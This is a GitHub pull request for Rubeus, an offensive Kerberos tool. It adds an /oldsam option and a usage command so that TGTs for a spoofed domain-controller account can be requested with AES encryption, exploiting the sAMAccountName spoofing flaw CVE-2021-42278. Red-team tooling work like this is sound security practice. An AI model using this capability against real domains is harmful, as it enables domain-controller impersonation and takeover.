### PR TITLE
Request TGTs with AES Encryption when performing computer account samaccountname spoofing

### DIFF
--- a/Rubeus/Commands/Asktgt.cs
+++ b/Rubeus/Commands/Asktgt.cs
@@ -85,6 +85,13 @@ namespace Rubeus.Commands
                     salt = String.Format("{0}host{1}.{2}", domain.ToUpper(), user.TrimEnd('$').ToLower(), domain.ToLower());
                 }
 
+                // special case for samaccountname spoofing to support Kerberos AES Encryption
+                if (arguments.ContainsKey("/oldsam"))
+                {
+                    salt = String.Format("{0}host{1}.{2}", domain.ToUpper(), arguments["/oldsam"].TrimEnd('$').ToLower(), domain.ToLower());
+
+                }
+
                 hash = Crypto.KerberosPasswordHash(encType, password, salt);
             }
 

--- a/Rubeus/Domain/Info.cs
+++ b/Rubeus/Domain/Info.cs
@@ -21,10 +21,10 @@ namespace Rubeus.Domain
  Ticket requests and renewals:
 
     Retrieve a TGT based on a user password/hash, optionally saving to a file or applying to the current logon session or a specific LUID:
-        Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac]
+        Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/oldsam]
 
     Retrieve a TGT based on a user password/hash, start a /netonly process, and to apply the ticket to the new process/logon session:
-        Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/opsec] [/nopac]
+        Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/opsec] [/nopac] [/oldsam]
 
     Retrieve a TGT using a PCKS12 certificate, start a /netonly process, and to apply the ticket to the new process/logon session:
         Rubeus.exe asktgt /user:USER /certificate:C:\temp\leaked.pfx </password:STOREPASSWORD> /createnetonly:C:\Windows\System32\cmd.exe [/getcredentials] [/servicekey:KRBTGTKEY] [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/nopac]


### PR DESCRIPTION
Provides the capability to request TGT tickets for computer accounts which have been renamed but not had their password updated.

This change was born from the Computer SAMAccountName spoofing vulnerability which microsoft patched in the Nov 9th Updates. [CVE-2021-42278](https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e). 

Without this change it is only possible to use RC4  Kerberos Encryption on the spoofed TGT for the domain controller.

**Usage**
```
.\Rubeus.exe asktgt /user:DC2 /enctype:aes256 /oldsam:comp1 /password:Password1 /domain:domain.local /dc:dc2.domain.local /nowrap 
```

![image](https://user-images.githubusercontent.com/23236842/146588459-fd834afd-86fd-415d-bb84-31c5ac993108.png)

**Proof of the salt**
Here is an output of a DCSync showing the SAMAccountName is DC2 but the salt is still the original computername.
![image](https://user-images.githubusercontent.com/23236842/146587764-35ab6e7e-d9a5-4a46-af56-1dc215a0b0b5.png)






